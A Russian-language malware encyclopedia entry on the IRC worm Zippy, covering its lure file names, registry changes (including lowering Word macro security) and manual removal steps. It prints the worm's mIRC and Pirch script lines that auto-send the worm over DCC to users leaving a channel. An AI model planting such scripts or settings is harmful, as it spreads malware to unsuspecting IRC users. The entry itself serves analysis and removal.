IRC-Worm.Win32.Zippy

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm.Win32.Zippy Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 36 864 байт. Написан на Visual Basic.

Инсталляция

Копирует свой исполняемый файл в корневой каталог диска С: с одним из следующих имен: 

MyPics.exe
FunJokes.exe
PornPics.exe
PornSite.exe
Document.exe
Game.exe
Zippy.exe

Деструктивная активность

Ищет папку в которую установлен клиент mIRC и записывает следующие строки: 

n0=on 1:PART:#: if ( $me != $nick ) { /dcc send $nick C:\<имя исполняемого файла червя> }

в файл script.ini, находящийся в этой папке.

Ищет папку в которую установлен кдиент Pirch и записывает следующие строки 

[Levels]
Enabled=1
Count=1
Level1=000-Unknowns
000-UnknownsEnabled=1
[000-Unknowns]
User1=*!*@*
UserCount=1
Event1=ON PART:#:/dcc send $nick C:\<имя исполняемого файла червя>

в файл events.ini, находящийся в этой папке. Данный скрипт расссылает исполняемый файл червя используя сервис DCC всем присоединяющимся к каналу клиентам.

Внедряет в текущий открытый документ Microsoft Word вредоносный макрос, который записывает тело червя в файл 

C:\WalruS.drv

Изменяет значения параметров ключей реестра: 

[HKCU\Software\Microsoft\Office\9.0\Word\Security]
Level=1
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion]
RegisteredOwner=” WalruS”

Периодически макрос вставляет в текст текущего документа строку: “The WalruS” написаннную шрифтом Arial Black 72-го размера.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи ("Диспетчера задач") завершить процесс червя.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить параметры в ключах реестра (как работать с реестром?):
    4. [HKCU\Software\Microsoft\Office\9.0\Word\Security]
Level=1
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion]
RegisteredOwner=” WalruS”
  1. Удалить файлы:
    2. C:\MyPics.exe
C:\FunJokes.exe
C:\PornPics.exe
C:\PornSite.exe
C:\Document.exe
C:\Game.exe
C:\Zippy.exe
C:\WalruS.drv
Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.Win32.Zippy»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.